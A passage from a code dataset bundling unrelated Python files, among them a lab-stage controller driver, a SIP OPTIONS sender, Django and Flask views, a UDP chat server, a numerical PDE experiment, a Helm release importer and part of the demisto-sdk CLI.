else:\r\n return rd[3:]\r\n\r\n #:::::::::::::::::::::::POSITION CHECK FUNCTIONS::::::::::::::::::::::::::: \r\n def reqPosSet(self) -> dict:\r\n '''Requests the target position\r\n\r\n Returns:\r\n dict = keys as axes, values as position or -9999 if error\r\n if there is an error, another dict is returned with error codes\r\n or\r\n -1 if communication isn't open\r\n '''\r\n #Check if port is open\r\n if self.con_type is None:\r\n debug('ERROR::: Device must be open\\n' + \r\n ' solution: call open()')\r\n return -1\r\n \r\n ret = {}\r\n err = {}\r\n for axis in self.axes:\r\n self.write('1TH{}'.format(self.axes[axis])) #get target position\r\n rd = self.read()[3:]\r\n rd = rd[len(self.axes[axis]):]\r\n \r\n #Check for errors\r\n erFlg, erCd = self.isError()\r\n if erFlg:\r\n debug('DEV ERROR::: Device returned error:\\n' +\r\n ' ' + self.errorStr(erCd))\r\n ret[axis] = -9999\r\n err[axis] = erCd\r\n else: ret[axis] = float(rd)\r\n\r\n if len(err) > 0: return ret, err\r\n else: return ret\r\n \r\n def reqPosAct(self) -> dict:\r\n '''Requests the current position\r\n\r\n Returns:\r\n dict = keys as axes, values as position or -9999 if error\r\n if there is an error, another dict is returned with error codes\r\n or\r\n -1 if communication isn't open\r\n '''\r\n #Check if port is open\r\n if self.con_type is None:\r\n debug('ERROR::: Device must be open\\n' + \r\n ' solution: call open()')\r\n return -1\r\n \r\n ret = {}\r\n err = {}\r\n for axis in self.axes:\r\n self.write('1TP{}'.format(self.axes[axis])) #get current position\r\n rd = self.read()[3:]\r\n rd = rd[len(self.axes[axis]):]\r\n \r\n #Check for errors\r\n erFlg, erCd = self.isError()\r\n if erFlg:\r\n debug('DEV ERROR::: Device returned error:\\n' +\r\n ' ' + self.errorStr(erCd))\r\n ret[axis] = -9999\r\n err[axis] = erCd\r\n else: ret[axis] = float(rd)\r\n \r\n if len(err) > 0: return ret, err\r\n else: return ret\r\n\r\n def reqInfo(self):\r\n '''Reads device information and updates variables\r\n *These values usually don't change so accessing them from the \r\n instance variable is more efficient than repeating a call to \r\n reqInfo()\r\n *To simply display values, use devPrint()\r\n Returns: \r\n Serial number, device number, revision version\r\n '''\r\n #Check if port is open\r\n if self.con_type is None:\r\n debug('ERROR::: Device must be open\\n' + \r\n ' solution: call open()')\r\n return -1\r\n \r\n #Request and read device information\r\n self.write('1ID?') #Get stage identifier\r\n rd = self.read()\r\n \r\n #Format and set SN and TY instance variables\r\n self.SN = rd[18:25] \r\n self.TY = rd[3:14] \r\n \r\n #Request and read revision information\r\n self.write('1VE') #Get controller revision information \r\n rd = self.read()\r\n \r\n #Format and set FW instance variable\r\n self.FW = rd[15:]\r\n \r\n def reqLim(self) -> dict:\r\n '''Reads device software limits and updates variables\r\n *These values usually don't change so accessing them from the \r\n instance variable is more efficient than repeating a call to \r\n reqLim()\r\n *To simply display the values, use devPrint()\r\n Returns: \r\n dict = keys as axes, values as lists: index 0 = min, index 1 = max\r\n or\r\n -1 if communication isn't open\r\n '''\r\n #Check if port is open\r\n if self.con_type is None:\r\n debug('ERROR::: Device must be open\\n' + \r\n ' solution: call open()')\r\n return -1\r\n \r\n for axis in self.axes: \r\n #Request and read lower limit\r\n self.write('1SL{}?'.format(self.axes[axis]))\r\n rd = self.read()[3:]\r\n rd = 
rd[len(self.axes[axis]):]\r\n \r\n #Format and set MNPS instance variable\r\n temp_lim = [float(rd)]\r\n \r\n #Request and read upper limit\r\n self.write('1SR{}?'.format(self.axes[axis]))\r\n rd = self.read()[3:]\r\n rd = rd[len(self.axes[axis]):]\r\n \r\n #Format and set MXPS instance variable \r\n temp_lim.append(float(rd))\r\n\r\n self.lims[axis] = temp_lim\r\n \r\n return self.lims \r\n","sub_path":"nsfiu/support/Python/Conex.py","file_name":"Conex.py","file_ext":"py","file_size_in_byte":27443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"222792599","text":"import socket\nimport sys\nfrom time import strftime, gmtime\n\n# Create a UDP socket\nsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n\nserver_address = ('10.0.1.222', 5060)\nRFC1123_date = str(strftime(\"%a, %d %b %Y %H:%M:%S +0000\", gmtime()))\nMESSAGE = (\n 'OPTIONS sip:Desktop@10.0.1.43;transport=udp SIP/2.0\\r\\n'\n 'Via: SIP/2.0/UDP 10.0.1.222:5060;branch=z9hG4bK779769ef;rport\\r\\n'\n 'Max-Forwards: 70\\r\\n'\n 'From: \"asterisk\" ;tag=as0372b144\\r\\n'\n 'To: \\r\\n'\n 'Contact: \\r\\n'\n 'Call-ID: 426fb56170cf3c25547ef70b695e91e1@10.0.1.222:5060\\r\\n'\n 'CSeq: 102 OPTIONS\\r\\n'\n 'User-Agent: PythonAsterisk\\r\\n'\n 'Date: ' + RFC1123_date + '\\r\\n'\n 'Allow: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY, INFO, PUBLISH\\r\\n'\n 'Supported: replaces, timer\\r\\n'\n 'Content-Length: 0\\r\\n'\n '\\r\\n'\n)\n\nMESSAGE = MESSAGE.format(RFC1123_date)\nprint(MESSAGE);\n\nacciiMESSAGE = (MESSAGE.encode('ascii'))\n\n\ntry:\n\n # Send data\n print('sending \"%s\"' % acciiMESSAGE)\n sent = sock.sendto(acciiMESSAGE, server_address)\n\n # Receive response\n print('waiting to receive\\n')\n data, server = sock.recvfrom(4096)\n data = data.decode('utf-8')\n print('received \\n\"%s\"' % data)\n\nfinally:\n print('closing socket')\n sock.close()\n","sub_path":"Stuff I started with and can probably canibalise but probably shouldnt/SendOPTIONS2.py","file_name":"SendOPTIONS2.py","file_ext":"py","file_size_in_byte":1366,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"78044185","text":"from celery import Celery\nfrom sqlalchemy.orm import scoped_session\n\nfrom classes.Errors import UserException, ServiceUnreachable\nfrom database import db, StatsTab\nfrom sqlalchemy import and_\n\nfrom classes.Stats import Stats\n\nBACKEND = BROKER = 'redis://localhost:6379'\n# BACKEND = BROKER = 'redis://0.0.0.0:6379'\n\ncelery = Celery(__name__, backend=BACKEND, broker=BROKER)\n\n_APP = None\n\n\n@celery.task\ndef calc_stats_async(user_id):\n global _APP\n if _APP is None:\n from app import create_app\n app = create_app()\n else:\n app = _APP\n with app.app_context():\n stats: Stats\n\n try:\n stats = Stats(user_id)\n except UserException:\n print('Try get Stats from unknown user wit id ' + str(user_id))\n return\n except ServiceUnreachable as e:\n print(e)\n return\n except Exception as e:\n print('Unexpected Exception')\n print(e)\n return\n\n session = db.session\n\n q = session.query(StatsTab).filter(StatsTab.user_id == user_id)\n stats_db = q.first()\n\n if not stats_db:\n stats_db = StatsTab()\n stats_db.user_id = stats.user.id\n stats_db.email = stats.user.email\n stats_db.firstname = stats.user.firstname\n stats_db.lastname = stats.user.lastname\n session.add(stats_db)\n\n stats_db.numStories = stats.numStories\n stats_db.numDice = stats.numDice\n stats_db.likes = stats.likes\n stats_db.dislikes = 
stats.dislikes\n\n stats_db.avgLike = stats.avgLike\n stats_db.avgDislike = stats.avgDislike\n stats_db.avgDice = stats.avgDice\n\n stats_db.ratio_likeDislike = stats.ratio_likeDislike\n stats_db.love_level = stats.love_level\n\n # db.session.add(stats_db)\n session.commit()\n","sub_path":"background.py","file_name":"background.py","file_ext":"py","file_size_in_byte":1868,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"622458182","text":"# -*- coding: utf-8 -*-\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth import login, authenticate\nfrom django.shortcuts import render, redirect\nfrom django.http import JsonResponse, HttpResponse, HttpResponseRedirect\nfrom forms import UserForm, ProfileForm,RegistrationForm\nfrom django.db import transaction\nfrom django.contrib import messages\nfrom suvenirka_order.models import *\nfrom suvenirka_product.models import *\nfrom accounts.models import *\nfrom suvenirka_product.forms import QuestionProdukt\nfrom django.contrib.auth.forms import UserChangeForm, PasswordChangeForm\n\n#@login_required\n#def home(request):\n# return render(request, 'update_profile')\n\ndef login_all(request):\n if request.POST:\n print('POST')\n username=request.POST.get('username','')\n password=request.POST.get('password','')\n user=authenticate(username=username, password=password)\n if user is not None:\n login(request, user)\n print(\"auth is ok!\")\n print(request.META.get('HTTP_REFERER'))\n return HttpResponseRedirect(request.META.get('HTTP_REFERER'))\n else:\n args['login_error']=\"Пользователь не найден\"\n return HttpResponseRedirect(request.META.get('HTTP_REFERER'))\n\n else:\n return render(request, 'accounts/log_all.html', locals())\n\n\n\ndef signup(request):\n if request.method =='POST':\n form = RegistrationForm(request.POST)\n if form.is_valid():\n form.save()\n return redirect('update_profile')\n else:\n form = RegistrationForm()\n\n args = {'form': form}\n return render(request, 'accounts/signup.html', {'form': form})\n\n\n\n@login_required\ndef view_profile(request):\n form = QuestionProdukt(request.POST or None)\n if request.method == \"POST\" and form.is_valid():\n print (\"FORMA VOPROSA PROSHLA\")\n data = form.cleaned_data\n data = request.POST\n you_name = request.user.username\n you_phone = request.user.profile.tel_number\n you_question = data[\"you_question\"]\n print (data)\n paf= request.path\n paf_url=paf\n print (paf_url)\n instance = IssuesProdukt.objects.create(issues_url=paf_url,you_name=you_name,you_phone=you_phone,you_question=you_question)\n instance.save()\n messages.success(request, ('Ваш вопрос получен. 
Наш менеджер свяжется с Вами в близжайшее время!'))\n return HttpResponseRedirect(request.META['HTTP_REFERER'])\n user_view = User.objects.filter(id=request.user.id)\n profile = Profile.objects.filter(id=request.user.id)\n orders = ProductInOrder.objects.filter(order__user=request.user.id)\n\n\n return render(request, 'accounts/profile_view.html', locals())\n\n\n\n@login_required\n@transaction.atomic\ndef update_profile(request):\n if request.method == 'POST':\n print('POST')\n user_form = UserForm(request.POST, instance=request.user)\n profile_form = ProfileForm(request.POST, instance=request.user.profile)\n if user_form.is_valid() and profile_form.is_valid():\n user_form.save()\n profile_form.save()\n messages.success(request, ('Ваши данные успешно обновлены'))\n print('form too is valid')\n return redirect('update_profile')\n else:\n messages.error(request, ('Error:Пожалуйста проверьте введенные данные!'))\n else:\n user_form = UserForm(instance=request.user)\n profile_form = ProfileForm(instance=request.user.profile)\n return render(request, 'accounts/profile.html', {\n 'user_form': user_form,\n 'profile_form': profile_form\n })\n","sub_path":"tv_mas/accounts/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3818,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"176899939","text":"import json\r\nfrom flask import Flask, render_template, request, jsonify \r\n\r\napp = Flask(__name__)\r\n\r\n@app.route(\"/\")\r\ndef home():\r\n return render_template(\"InputOutput.html\") \r\n \r\n\r\n@app.route(\"/submitJSON\", methods=[\"POST\"])\r\ndef processJSON(): \r\n jsonStr = request.get_json()\r\n jsonObj = json.loads(jsonStr) \r\n \r\n response = \"\"\r\n a=int(jsonObj['a'])\r\n b=int(jsonObj['b'])\r\n c=int(jsonObj['c'])\r\n d=int(jsonObj['d'])\r\n k=b\r\n b=a\r\n a=k\r\n response+=\" The new value of a is \"+str(a)+\" The new value of b is \"+str(b)+\"
\"\r\n response+=\" The new value of c is \"+str((c^d)^c)+\" The new value of d is \"+str((c^d)^d)+\"
\" \r\n a = 20\r\n b = 10\r\n c = 15\r\n d = 5\r\n e1=(a + b) * c // d >>1\r\n e2=(a + b * c) // d>>1\r\n e3=(a + b) * (c // (d>>1))\r\n e4=a + (b * c) // d>>1\r\n response+=\" Value of e1 is \"+str(e1)+\"
\" \r\n response+=\" Value of e2 is \"+str(e2)+\"
\"\r\n response+=\" Value of e3 is \"+str(e3)+\"
\"\r\n response+=\" Value of e4 is \"+str(e4)+\"
\" \r\n \r\n \r\n \t \r\n return response\r\n \r\n \r\nif __name__ == \"__main__\":\r\n app.run(debug=True)\r\n \r\n \r\n","sub_path":"convertion.py","file_name":"convertion.py","file_ext":"py","file_size_in_byte":1219,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"623196054","text":"#tuples\na=('a', 1, 'doi', True)\nb='b', 2, 'trei', False\n\nprint(type(a))\nprint(type(b))\nprint(a+b)\n\nd={'name':'', 'age':0, 'profession':''}\nd['name']=input()\nd['age']=input()\nd['profession']=input()\nprint(d)","sub_path":"basic2.py","file_name":"basic2.py","file_ext":"py","file_size_in_byte":206,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"345018962","text":"N = int(input())\nA = [0]*N\nB = [0]*N\nfor i in range(N):\n A[i],B[i] = map(int, input().split())\nA.sort()\nB.sort(reverse=True)\nif N%2==1:\n mid = (N+1)//2-1\n ans = B[mid]-A[mid]+1\nelse:\n mid1 = N//2-1\n mid2 = N//2\n ans = (B[mid1]+B[mid2])-(A[mid1]+A[mid2])+1\n\nprint(ans)\n","sub_path":"Python_codes/p02661/s050407528.py","file_name":"s050407528.py","file_ext":"py","file_size_in_byte":274,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"475901386","text":"# -*- coding: utf-8 -*-\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\n\nfrom ralph.util import plugin, api_pricing\nfrom ralph_pricing.models import Venture\n\n\ndef update_venture(data):\n venture, created = Venture.objects.get_or_create(\n venture_id=data['id'],\n )\n venture.name = data['name']\n venture.department = data['department']\n venture.symbol = data['symbol']\n venture.business_segment = data['business_segment']\n venture.profit_center = data['profit_center'] or ''\n venture.is_active = data['show_in_ralph']\n if data.get('parent_id'):\n parent, parent_created = Venture.objects.get_or_create(\n venture_id=data['parent_id'],\n )\n venture.parent = parent\n else:\n venture.parent = None\n parent_created = False\n venture.save()\n return created + parent_created\n\n\n@plugin.register(chain='pricing', requires=[])\ndef ventures(**kwargs):\n \"\"\"Updates the ventures from Ralph.\"\"\"\n\n count = sum(update_venture(data) for data in api_pricing.get_ventures())\n Venture.tree.rebuild()\n return True, '%d new ventures' % count, kwargs\n","sub_path":"src/ralph_pricing/plugins/collects/ventures.py","file_name":"ventures.py","file_ext":"py","file_size_in_byte":1224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"605560762","text":"# -*- coding: utf8 -*-fr\n# pylint: disable=too-many-instance-attributes, invalid-name\n\"\"\"\nHasManager is a mixin representing the manager attached to some of the objects.\n\"\"\"\n\nfrom itopapi.model.prototype import ItopapiPrototype\n\n__version__ = '1.0'\n__authors__ = ['Julien Nauroy ']\n\n\nclass HasManager(object):\n \"\"\"\n HasManager represents the Manager attached to some top-level objects.\n \"\"\"\n\n \"\"\" Configuration specific to itop \"\"\"\n foreign_key = {'id': 'manager_id', 'name': 'manager_name', 'table': 'Person'}\n\n def __init__(self):\n super(HasManager, self).__init__()\n\n # Object's manager id. Call find_manager to get the full information or just use manager_name\n self.manager_id = None\n # Object's manager id's friendly name. 
Not sure the difference with manager_name\n self.manager_id_friendlyname = None\n # Object's manager name\n self.manager_name = None\n\n def find_manager(self):\n \"\"\"\n Retrieve the ItopapiManager related to this instance\n \"\"\"\n if self.manager_id is not None:\n return ItopapiPrototype.get_itop_class('Person').find(self.manager_id)\n return None\n\n def set_manager(self, manager):\n \"\"\"\n Set the ItopapiPerson parameters\n \"\"\"\n self.manager_id = manager.instance_id\n self.manager_id_friendlyname = manager.friendlyname\n self.manager_name = manager.name\n","sub_path":"itopapi/model/features/hasManager.py","file_name":"hasManager.py","file_ext":"py","file_size_in_byte":1457,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"640810925","text":"\"\"\"\nAuthor: Levi\nEmail: lvze@tedu.cn\nTime : 2020-12-15\nEnv : Python3.6\n\nsocket and process exercise\n\"\"\"\nfrom socket import *\nfrom multiprocessing import Process\n\n# 服务器地址\nHOST = \"0.0.0.0\"\nPORT = 8888\nADDR = (HOST, PORT)\n\n# 存储用户信息的结构 {name:address}\nuser = {}\n\n\ndef do_login(sock, name, address):\n if name in user or \"管理\" in name:\n sock.sendto(b\"FAIL\", address)\n else:\n sock.sendto(b\"OK\", address)\n # 先通知其他人\n msg = \"欢迎 %s 进入聊天室\" % name\n for key, value in user.items():\n sock.sendto(msg.encode(), value)\n # 加入用户\n user[name] = address\n\n\ndef do_chat(sock, name, content):\n msg = \"%s : %s\" % (name, content)\n for key, value in user.items():\n # 不是本人\n if key != name:\n sock.sendto(msg.encode(), value)\n\n\ndef do_exit(sock, name):\n del user[name] # 从字典删除\n msg = \"%s 退出了聊天\" % name\n # 通知其他人\n for key, value in user.items():\n sock.sendto(msg.encode(), value)\n\n\ndef handle(sock):\n # 循环接收用户请求\n while True:\n data, addr = sock.recvfrom(1024)\n tmp = data.decode().split(' ', 2)\n # 根据请求,分情况讨论\n if tmp[0] == \"LOGIN\":\n # tmp->[LOGIN,name]\n do_login(sock, tmp[1], addr)\n elif tmp[0] == \"CHAT\":\n # tmp->[CHAT,name,xxxx]\n do_chat(sock, tmp[1], tmp[2])\n elif tmp[0] == \"EXIT\":\n # tmp->[EXIT,name]\n do_exit(sock, tmp[1])\n\n\n# 搭建总体逻辑结构\ndef main():\n # 创建udp套接字\n sock = socket(AF_INET, SOCK_DGRAM)\n sock.bind(ADDR)\n\n p = Process(target=handle, args=(sock,), daemon=True)\n p.start()\n\n # 父进程发送管理员消息\n while True:\n content = input(\"管理员消息:\")\n if content == \"exit\":\n break\n msg = \"CHAT 管理员消息 \"+content\n # 发送给子进程\n sock.sendto(msg.encode(),ADDR)\n\n\nif __name__ == '__main__':\n main() # 启动\n","sub_path":"month02/day14/chat_server.py","file_name":"chat_server.py","file_ext":"py","file_size_in_byte":2077,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"154771981","text":"\n# coding: utf-8\n\n# In[1]:\n\n\nimport shelve\nimport numpy\nimport models\nimport exts\n\n\n# In[2]:\n\n\nd_list = [0.01, 0.1, 1.0, 10.0]\nd_name = [\"0.01\", \"0.1\", \"1.0\", \"10.0\"]\nn = 100\nh = 1.0 / n\nm_list = [\n 2, 3, 4, 6, 8, 12, 17, 25, 35, 50, 70, 100, 141, 200,\n 282, 400, 565, 800, 1131, 1600, 2262, 3200, 4525, 6400,\n 9050, 12800, 18101, 25600, 36203, 51200, 72407, 102400,\n 144815, 204800, 289630, 409600, 579261, 819200\n]\ntheta_name = [\"0\", \" 1 / 2 \", \" 1 / 2 - 1 / 12 \\\\mu \", \"1\"]\n\n\n# In[3]:\n\n\nrt = [{}, {}]\n\n\n# In[4]:\n\n\nfor d in d_list:\n \n for i in range(4):\n rt[0][str((d, i))] = [] \n rt[1][str((d, i))] = []\n \n for m in m_list:\n \n u = models.calc_init_3(n)\n exts.para_theta_model_wrapper(n, int(m * d + 0.5), d, 0.0, u)\n u_ana = models.calc_approx_3(n, d)\n 
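        # (Editorial note: the two appends below record complementary error measures
        # for the theta = 0 run -- the max-norm and a discrete 2-norm; the sqrt(h)
        # factor scales the latter so it approximates the continuous L2 norm on [0, 1].)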
rt[0][str((d, 0))].append(numpy.linalg.norm(u - u_ana, numpy.infty))\n rt[1][str((d, 0))].append(numpy.linalg.norm(u - u_ana, 2.0) * numpy.sqrt(h))\n \n u = models.calc_init_3(n)\n exts.para_theta_model_wrapper(n, int(m * d + 0.5), d, 0.5, u)\n u_ana = models.calc_approx_3(n, d)\n rt[0][str((d, 1))].append(numpy.linalg.norm(u - u_ana, numpy.infty))\n rt[1][str((d, 1))].append(numpy.linalg.norm(u - u_ana, 2.0) * numpy.sqrt(h))\n \n tau = 1.0 / m\n mu = tau / h**2\n theta = 1.0 / 2.0 - 1.0 / 12.0 / mu\n if theta <= 1.0:\n u = models.calc_init_3(n)\n exts.para_theta_model_wrapper(n, int(m * d + 0.5), d, theta, u)\n u_ana = models.calc_approx_3(n, d)\n rt[0][str((d, 2))].append(numpy.linalg.norm(u - u_ana, numpy.infty))\n rt[1][str((d, 2))].append(numpy.linalg.norm(u - u_ana, 2.0) * numpy.sqrt(h))\n else:\n rt[0][str((d, 2))].append(numpy.infty)\n rt[1][str((d, 2))].append(numpy.infty)\n \n u = models.calc_init_3(n)\n exts.para_theta_model_wrapper(n, int(m * d + 0.5), d, 1.0, u)\n u_ana = models.calc_approx_3(n, d)\n rt[0][str((d, 3))].append(numpy.linalg.norm(u - u_ana, numpy.infty))\n rt[1][str((d, 3))].append(numpy.linalg.norm(u - u_ana, 2.0) * numpy.sqrt(h))\n \n print(\"d = {}, m = {} finished\".format(d, m))\n\n\n# In[5]:\n\n\nwith shelve.open(\"Result\") as db:\n db[str((2, 5, \"d\"))] = d_list\n db[str((2, 5, \"d\", \"name\"))] = d_name\n db[str((2, 5, \"m\"))] = m_list\n db[str((2, 5, \"theta\", \"name\"))] = theta_name\n db[str((2, 5, \"normi\"))] = rt[0]\n db[str((2, 5, \"norm2\"))] = rt[1]\n\n","sub_path":"P03Discont/Problem2Part5.py","file_name":"Problem2Part5.py","file_ext":"py","file_size_in_byte":2538,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"437934513","text":"import openpyxl\nimport csv\n#csvfile = \"input.csv\"\ncsvfile = \"/Users/hegderajesh/Downloads/MUHURTHA REGISTRATION.csv\"\nxlfile = 'format.xlsx'\n\n# initializing the titles and rows list \nfields = [] \nrows = []\n\n# reading csv file \nwith open(csvfile, 'r') as csvfile: \n # creating a csv reader object \n csvreader = csv.reader(csvfile) \n \n # extracting field names through first row \n fields = next(csvreader) \n \n # extracting each data row one by one \n for row in csvreader: \n rows.append(row)\n\n # open xlsx file and select sheet1\nwb = openpyxl.load_workbook(filename=xlfile)\nws = wb.get_sheet_by_name('Sheet1')\n\nfor i in range(len(rows)):\n print('Processing', i ,'row')\n # writing data to cell in loop\n ws.cell(row=5, column=4, value=rows[i][3])\n ws.cell(row=5, column=3, value='Name of '+rows[i][2])\n ws.cell(row=5, column=7, value=rows[i][4])\n ws.cell(row=6, column=4, value=rows[i][5])\n ws.cell(row=6, column=7, value=rows[i][6])\n ws.cell(row=7, column=4, value=rows[i][7])\n ws.cell(row=7, column=7, value=rows[i][8])\n ws.cell(row=8, column=4, value=rows[i][9])\n ws.cell(row=8, column=7, value=rows[i][10])\n ws.cell(row=9, column=4, value=rows[i][11])\n ws.cell(row=9, column=7, value=rows[i][12])\n ws.cell(row=10, column=4, value=rows[i][13])\n ws.cell(row=10, column=7, value=rows[i][14])\n ws.cell(row=11, column=4, value=rows[i][15])\n ws.cell(row=11, column=7, value=rows[i][16])\n ws.cell(row=12, column=4, value=rows[i][17])\n ws.cell(row=12, column=7, value=rows[i][18])\n ws.cell(row=13, column=4, value=rows[i][19])\n ws.cell(row=13, column=7, value=rows[i][20])\n ws.cell(row=14, column=4, value=rows[i][1])\n ws.cell(row=14, column=7, value=rows[i][21])\n ws.cell(row=16, column=7, value=rows[i][0])\n ws.cell(row=21, column=3, 
value=rows[i][25])\n ws.cell(row=23, column=4, value=rows[i][23])\n # save file\n new_filename = rows[i][1]\n wb.save('/Users/hegderajesh/Documents/Website/Muhurtha/MuhurthaFiles/'+new_filename+'.xlsx')\n print('Done. Saved!')","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":2068,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"68408111","text":"# -- coding: utf-8 --\n\n# Copyright 2019 FairwindsOps Inc\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport json\nimport logging\n\nfrom .helm.client import get_helm_client\nfrom .config import Config\nfrom .exception import ReckonerException\n\nlogger = logger = logging.getLogger(__name__)\n\n\ndef get_values(release: str, namespace: str) -> dict:\n \"\"\"\n Gets the user supplied values from the helm release specified\n Arguments:\n release: The name of the release to import. No default.\n namespace: The namespace of the release to import. No default.\n\n Returns:\n Dictionary of release values\n \"\"\"\n helm_client = get_helm_client(helm_arguments=Config().helm_args)\n response = helm_client.get_values(\n [f'--namespace={namespace}', release]\n )\n if response.exit_code:\n raise ReckonerException(f'Error getting values: {response.stderr}')\n\n return json.loads(response.stdout)\n\n\ndef list_release(release: str, namespace: str) -> dict:\n \"\"\"\n Gets chart name and chart version information about the release specified\n Arguments:\n release: The name of the release to import. No default.\n namespace: The namespace of the release to import. No default.\n\n Returns:\n Dictionary of realease information\n \"\"\"\n helm_client = get_helm_client(helm_arguments=Config().helm_args)\n response = helm_client.list_releases(\n [f'--namespace={namespace}']\n )\n\n if response.exit_code:\n raise ReckonerException(f'Error getting release: {response.stderr}')\n\n for _release in json.loads(response.stdout):\n if _release.get('name') == release:\n return _release\n\n raise ReckonerException(f\"Release {release} not found in {namespace}\")\n\n\ndef draft_release(release: str, namespace: str, repository: str) -> dict:\n \"\"\"\n Parses release information and values, then parses them together into a dictionary\n with the specified release, namespace, repository, and values\n Arguments:\n release: The name of the release to import. No default.\n namespace: The namespace of the release to import. No default.\n repository: The repository the chart is from. 
No Default\n\n Returns:\n Dictionary of realease information\n \"\"\"\n release_info = list_release(release, namespace)\n release_values = get_values(release, namespace)\n\n output = {\n release: {\n 'chart': \"-\".join(release_info.get('chart', '').split('-')[0:-1]),\n 'repository': repository,\n 'version': release_info.get('chart', '').split('-')[-1],\n 'namespace': namespace,\n 'values': release_values,\n }\n }\n\n return output\n","sub_path":"reckoner/importer.py","file_name":"importer.py","file_ext":"py","file_size_in_byte":3157,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"531148527","text":"# Site packages\nimport json\nimport logging\nimport os\nimport sys\nfrom configparser import ConfigParser, MissingSectionHeaderError\nfrom pathlib import Path\nfrom typing import IO\n\nfrom pkg_resources import get_distribution\n\n# Third party packages\nimport click\nimport git\nfrom demisto_sdk.commands.common import tools\nfrom demisto_sdk.commands.common.configuration import Configuration\n# Common tools\nfrom demisto_sdk.commands.common.constants import (\n API_MODULES_PACK, SKIP_RELEASE_NOTES_FOR_TYPES, FileType)\nfrom demisto_sdk.commands.common.legacy_git_tools import get_packs\nfrom demisto_sdk.commands.common.logger import logging_setup\nfrom demisto_sdk.commands.common.tools import (filter_files_by_type,\n filter_files_on_pack, find_type,\n get_last_remote_release_version,\n get_pack_name, print_error,\n print_warning)\nfrom demisto_sdk.commands.common.update_id_set import merge_id_sets_from_files\nfrom demisto_sdk.commands.create_artifacts.content_artifacts_creator import \\\n ArtifactsManager\nfrom demisto_sdk.commands.create_id_set.create_id_set import IDSetCreator\nfrom demisto_sdk.commands.doc_reviewer.doc_reviewer import DocReviewer\nfrom demisto_sdk.commands.download.downloader import Downloader\nfrom demisto_sdk.commands.find_dependencies.find_dependencies import \\\n PackDependencies\nfrom demisto_sdk.commands.format.format_module import format_manager\nfrom demisto_sdk.commands.generate_docs.generate_integration_doc import \\\n generate_integration_doc\nfrom demisto_sdk.commands.generate_docs.generate_playbook_doc import \\\n generate_playbook_doc\nfrom demisto_sdk.commands.generate_docs.generate_script_doc import \\\n generate_script_doc\nfrom demisto_sdk.commands.generate_integration.code_generator import \\\n IntegrationGeneratorConfig\nfrom demisto_sdk.commands.generate_test_playbook.test_playbook_generator import \\\n PlaybookTestsGenerator\nfrom demisto_sdk.commands.init.initiator import Initiator\nfrom demisto_sdk.commands.integration_diff.integration_diff_detector import \\\n IntegrationDiffDetector\nfrom demisto_sdk.commands.json_to_outputs.json_to_outputs import \\\n json_to_outputs\nfrom demisto_sdk.commands.lint.lint_manager import LintManager\nfrom demisto_sdk.commands.openapi_codegen.openapi_codegen import \\\n OpenAPIIntegration\nfrom demisto_sdk.commands.postman_codegen.postman_codegen import \\\n postman_to_autogen_configuration\n# Import demisto-sdk commands\nfrom demisto_sdk.commands.run_cmd.runner import Runner\nfrom demisto_sdk.commands.run_playbook.playbook_runner import PlaybookRunner\nfrom demisto_sdk.commands.secrets.secrets import SecretsValidator\nfrom demisto_sdk.commands.split_yml.extractor import Extractor\nfrom demisto_sdk.commands.test_content.execute_test_content import \\\n execute_test_content\nfrom demisto_sdk.commands.unify.unifier import Unifier\nfrom 
demisto_sdk.commands.update_release_notes.update_rn import (\n UpdateRN, update_api_modules_dependents_rn)\nfrom demisto_sdk.commands.upload.uploader import Uploader\nfrom demisto_sdk.commands.validate.validate_manager import ValidateManager\n\n\nclass PathsParamType(click.Path):\n \"\"\"\n Defines a click options type for use with the @click.option decorator\n\n The type accepts a string of comma-separated values where each individual value adheres\n to the definition for the click.Path type. The class accepts the same parameters as the\n click.Path type, applying those arguments for each comma-separated value in the list.\n See https://click.palletsprojects.com/en/8.0.x/parameters/#implementing-custom-types for\n more details.\n \"\"\"\n\n def convert(self, value, param, ctx):\n if ',' not in value:\n return super(PathsParamType, self).convert(value, param, ctx)\n\n split_paths = value.split(',')\n # check the validity of each of the paths\n _ = [super(PathsParamType, self).convert(path, param, ctx) for path in split_paths]\n return value\n\n\nclass DemistoSDK:\n \"\"\"\n The core class for the SDK.\n \"\"\"\n\n def __init__(self):\n self.configuration = None\n\n\npass_config = click.make_pass_decorator(DemistoSDK, ensure=True)\n\n\ndef check_configuration_file(command, args):\n config_file_path = '.demisto-sdk-conf'\n true_synonyms = ['true', 'True', 't', '1']\n if os.path.isfile(config_file_path):\n 